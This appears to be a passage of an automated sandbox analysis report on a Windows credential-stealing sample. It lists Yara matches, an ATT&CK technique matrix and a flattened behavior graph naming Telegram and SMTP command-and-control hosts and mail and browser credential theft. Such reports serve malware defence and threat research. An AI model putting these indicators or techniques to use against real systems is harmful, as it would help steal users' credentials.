                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 18.2.HRrXXnBIpL.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.7495 P.exe.47d0650.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.HRrXXnBIpL.exe.3e3de80.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.7495 P.exe.478c830.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.7495 P.exe.47d0650.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.7495 P.exe.478c830.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000012.00000002.3727156029.000000000043E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 7495 P.exe PID: 5272, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 7495 P.exe PID: 8812, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HRrXXnBIpL.exe PID: 8888, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HRrXXnBIpL.exe PID: 9096, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 0000000D.00000002.3730302031.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.3730425071.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 2.2.7495 P.exe.47d0650.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.HRrXXnBIpL.exe.3e3de80.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.7495 P.exe.478c830.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.7495 P.exe.47d0650.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.7495 P.exe.478c830.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 7495 P.exe PID: 5272, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 7495 P.exe PID: 8812, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HRrXXnBIpL.exe PID: 8888, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HRrXXnBIpL.exe PID: 9096, type: MEMORYSTR
                  Source: Yara matchFile source: 2.2.7495 P.exe.47d0650.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.HRrXXnBIpL.exe.3e3de80.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.7495 P.exe.478c830.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.7495 P.exe.47d0650.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.7495 P.exe.478c830.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 7495 P.exe PID: 5272, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 7495 P.exe PID: 8812, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HRrXXnBIpL.exe PID: 8888, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Scheduled Task/Job
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  11
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  File and Directory Discovery
                  Remote Services11
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  Scheduled Task/Job
                  11
                  Process Injection
                  1
                  Deobfuscate/Decode Files or Information
                  LSASS Memory13
                  System Information Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  3
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  Scheduled Task/Job
                  3
                  Obfuscated Files or Information
                  Security Account Manager11
                  Security Software Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  11
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                  Software Packing
                  NTDS1
                  Process Discovery
                  Distributed Component Object ModelInput Capture1
                  Non-Standard Port
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading
                  LSA Secrets31
                  Virtualization/Sandbox Evasion
                  SSHKeylogging3
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading
                  Cached Domain Credentials1
                  Application Window Discovery
                  VNCGUI Input Capture24
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                  Virtualization/Sandbox Evasion
                  DCSync1
                  System Network Configuration Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                  Process Injection
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1638563 Sample: 7495 P.exe Startdate: 14/03/2025 Architecture: WINDOWS Score: 100 46 reallyfreegeoip.org 2->46 48 api.telegram.org 2->48 50 4 other IPs or domains 2->50 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 68 13 other signatures 2->68 8 7495 P.exe 7 2->8         started        12 HRrXXnBIpL.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 46->64 66 Uses the Telegram API (likely for C&C communication) 48->66 process4 file5 38 C:\Users\user\AppData\...\HRrXXnBIpL.exe, PE32 8->38 dropped 40 C:\Users\...\HRrXXnBIpL.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp843E.tmp, XML 8->42 dropped 44 C:\Users\user\AppData\...\7495 P.exe.log, ASCII 8->44 dropped 70 Adds a directory exclusion to Windows Defender 8->70 14 7495 P.exe 15 2 8->14         started        18 powershell.exe 21 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        72 Multi AV Scanner detection for dropped file 12->72 24 HRrXXnBIpL.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 52 okurkardesler.com 94.199.206.214, 49763, 49764, 587 AEROTEK-ASTR Turkey 14->52 54 api.telegram.org 149.154.167.220, 443, 49750, 49761 TELEGRAMRU United Kingdom 14->54 56 2 other IPs or domains 14->56 74 Loading BitLocker PowerShell Module 18->74 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        76 Tries to steal Mail credentials (via file / registry access) 24->76 78 Tries to harvest and steal browser information (history, passwords, etc) 24->78 36 conhost.exe 26->36         started        signatures9 process10

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.